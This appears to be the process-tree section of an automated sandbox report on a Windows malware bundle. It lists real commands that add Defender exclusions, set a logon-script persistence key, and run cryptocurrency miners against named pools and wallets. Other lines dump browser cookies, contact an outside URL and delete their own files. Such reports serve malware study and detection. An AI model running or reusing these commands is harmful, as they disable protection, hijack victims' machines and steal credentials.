C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "fher1bdbssg.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\uo4ymu0zow3\fher1bdbssg.exe" & exit16⤵PID:7892
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "fher1bdbssg.exe" /f17⤵
- Kills process with taskkill
PID:3880
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\krv4ylz4qax\vict.exe"C:\Users\Admin\AppData\Local\Temp\krv4ylz4qax\vict.exe" /VERYSILENT /id=53515⤵PID:4092
-
C:\Users\Admin\AppData\Local\Temp\is-P53D9.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-P53D9.tmp\vict.tmp" /SL5="$601D6,870426,780800,C:\Users\Admin\AppData\Local\Temp\krv4ylz4qax\vict.exe" /VERYSILENT /id=53516⤵PID:5184
-
C:\Users\Admin\AppData\Local\Temp\is-3G58G.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-3G58G.tmp\win1host.exe" 53517⤵PID:8156
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mswyxcqzpjg\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\mswyxcqzpjg\cpyrix.exe" /VERYSILENT15⤵PID:5288
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:3140
-
C:\Users\Admin\AppData\Local\Temp\2dc2d24d-9197-41a6-a471-231aea36d7e0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\2dc2d24d-9197-41a6-a471-231aea36d7e0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\2dc2d24d-9197-41a6-a471-231aea36d7e0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run17⤵PID:5272
-
C:\Users\Admin\AppData\Local\Temp\2dc2d24d-9197-41a6-a471-231aea36d7e0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\2dc2d24d-9197-41a6-a471-231aea36d7e0\AdvancedRun.exe" /SpecialRun 4101d8 527218⤵PID:7264
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force17⤵PID:6748
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 117⤵PID:7740
-
C:\Windows\SysWOW64\timeout.exetimeout 118⤵
- Delays execution with timeout.exe
PID:6880
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"17⤵PID:4880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 152817⤵
- Program crash
PID:4420
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:5772
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:5220
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3el3sxrumoo\vpn.exe"C:\Users\Admin\AppData\Local\Temp\3el3sxrumoo\vpn.exe" /silent /subid=48215⤵PID:7184
-
C:\Users\Admin\AppData\Local\Temp\is-BNGK4.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-BNGK4.tmp\vpn.tmp" /SL5="$3027A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\3el3sxrumoo\vpn.exe" /silent /subid=48216⤵PID:7356
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\UM4JFNFCNY\setups.exe"C:\Users\Admin\AppData\Local\Temp\UM4JFNFCNY\setups.exe" ll12⤵PID:2500
-
C:\Users\Admin\AppData\Local\Temp\is-K99LL.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-K99LL.tmp\setups.tmp" /SL5="$6048A,454998,229376,C:\Users\Admin\AppData\Local\Temp\UM4JFNFCNY\setups.exe" ll13⤵PID:7012
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:5460
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\50s1orfnwcl\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\50s1orfnwcl\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5132
-
C:\Users\Admin\AppData\Local\Temp\is-6SE0V.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-6SE0V.tmp\IBInstaller_97039.tmp" /SL5="$103A6,14574507,721408,C:\Users\Admin\AppData\Local\Temp\50s1orfnwcl\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5404
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-LB73M.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5916
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-LB73M.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:5412
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵PID:6712
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=10⤵PID:6796
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵PID:6788
-
-
C:\Users\Admin\AppData\Local\Temp\is-LB73M.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-LB73M.tmp\{app}\chrome_proxy.exe"10⤵PID:7996
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-LB73M.tmp\{app}\chrome_proxy.exe"11⤵PID:7924
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
PID:7804
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\20qb4iq3ahz\yohnrvphcf2.exe"C:\Users\Admin\AppData\Local\Temp\20qb4iq3ahz\yohnrvphcf2.exe" /quiet SILENT=1 AF=7568⤵PID:5356
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\20qb4iq3ahz\yohnrvphcf2.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\20qb4iq3ahz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617277040 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:6384
-
-
-
C:\Users\Admin\AppData\Local\Temp\luncznej53l\vpn.exe"C:\Users\Admin\AppData\Local\Temp\luncznej53l\vpn.exe" /silent /subid=4828⤵PID:5156
-
-
C:\Users\Admin\AppData\Local\Temp\aqpp5ckffjs\app.exe"C:\Users\Admin\AppData\Local\Temp\aqpp5ckffjs\app.exe" /8-238⤵PID:4944
-
-
C:\Users\Admin\AppData\Local\Temp\zculqsnmt13\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\zculqsnmt13\cpyrix.exe" /VERYSILENT8⤵PID:2644
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5748
-
C:\Users\Admin\AppData\Local\Temp\1b1d0d25-a1f3-4494-89b3-86f721adc93a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\1b1d0d25-a1f3-4494-89b3-86f721adc93a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1b1d0d25-a1f3-4494-89b3-86f721adc93a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵PID:6568
-
C:\Users\Admin\AppData\Local\Temp\1b1d0d25-a1f3-4494-89b3-86f721adc93a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\1b1d0d25-a1f3-4494-89b3-86f721adc93a\AdvancedRun.exe" /SpecialRun 4101d8 656811⤵PID:6804
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵PID:5368
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵PID:6100
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:5576
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:1500
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:6172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 152810⤵
- Program crash
PID:4164
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5936
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:6204
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:4628
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:5572
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ueodxsd3vpt\stqvv5i3lgu.exe"C:\Users\Admin\AppData\Local\Temp\ueodxsd3vpt\stqvv5i3lgu.exe"8⤵PID:4256
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ueodxsd3vpt\stqvv5i3lgu.exe"9⤵PID:2888
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5664
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\iwminb2igc3\vict.exe"C:\Users\Admin\AppData\Local\Temp\iwminb2igc3\vict.exe" /VERYSILENT /id=5358⤵PID:4508
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D2EW8NQO7W\setups.exe"C:\Users\Admin\AppData\Local\Temp\D2EW8NQO7W\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\is-S98U4.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-S98U4.tmp\setups.tmp" /SL5="$501E8,454998,229376,C:\Users\Admin\AppData\Local\Temp\D2EW8NQO7W\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:204
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4560 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:2932
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:2552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:4708
-
C:\Users\Admin\AppData\Roaming\B7AD.tmp.exe"C:\Users\Admin\AppData\Roaming\B7AD.tmp.exe"5⤵PID:4752
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:5880
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:4692
-
-
-
C:\Users\Admin\AppData\Roaming\B9C1.tmp.exe"C:\Users\Admin\AppData\Roaming\B9C1.tmp.exe"5⤵PID:2980
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\B9C1.tmp.exe6⤵PID:4896
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:7748
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:5656
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:5740
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵PID:3340
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:7604
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5800
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5584
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4244
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3912
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4572
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4452
-
C:\Users\Admin\AppData\Local\Temp\is-F282N.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-F282N.tmp\vpn.tmp" /SL5="$103A4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\luncznej53l\vpn.exe" /silent /subid=4821⤵PID:5376
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:5340
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵PID:5644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵PID:6364
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵PID:6040
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵PID:7216
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵PID:7516
-
-
C:\Users\Admin\AppData\Local\Temp\is-RFC43.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-RFC43.tmp\vict.tmp" /SL5="$103AC,870426,780800,C:\Users\Admin\AppData\Local\Temp\iwminb2igc3\vict.exe" /VERYSILENT /id=5351⤵PID:5416
-
C:\Users\Admin\AppData\Local\Temp\is-7PDDL.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-7PDDL.tmp\win1host.exe" 5352⤵PID:5872
-
C:\Users\Admin\AppData\Local\Temp\FoalyoYaj.exe"C:\Users\Admin\AppData\Local\Temp\FoalyoYaj.exe"3⤵PID:7596
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"4⤵PID:3176
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif4⤵PID:6868
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe5⤵PID:6932
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6000
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:6492
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2F4BC95D54BDE38A14E918BC1F6C7635 C2⤵PID:7004
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding ACECA24152776F4DB123A6ED55FE65902⤵PID:6396
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:1092
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵PID:820
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"4⤵PID:8648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE4773.bat" "3⤵PID:9904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE4949.bat" "3⤵PID:9012
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:3612
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5884
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5228
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6072
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:820
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{32bbd50d-a931-664a-b630-6804ca924609}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7888
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:5884
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:5752
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7200
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:7684
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:5960
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4380
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:1240
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:440
-
C:\Users\Admin\AppData\Local\Temp\FA93.exeC:\Users\Admin\AppData\Local\Temp\FA93.exe1⤵PID:2756
-
C:\Users\Admin\AppData\Local\Temp\293.exeC:\Users\Admin\AppData\Local\Temp\293.exe1⤵PID:2236
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7616
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4476
-
C:\Users\Admin\AppData\Local\Temp\26F5.exeC:\Users\Admin\AppData\Local\Temp\26F5.exe1⤵PID:7720
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\26F5.exe"2⤵PID:8484
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:4292
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8416
-
C:\Users\Admin\AppData\Local\Temp\382C.exeC:\Users\Admin\AppData\Local\Temp\382C.exe1⤵PID:8696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8696 -s 15042⤵
- Program crash
PID:7872
-
-
C:\Users\Admin\AppData\Local\Temp\3FED.exeC:\Users\Admin\AppData\Local\Temp\3FED.exe1⤵PID:9016
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8340
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4656
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8900
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:2580
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8204
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9172
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8784
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8540
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4784
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6036
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:1144
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6332
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8904
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:9932
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8488
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9708
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3080
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7488
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9324
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10056
-
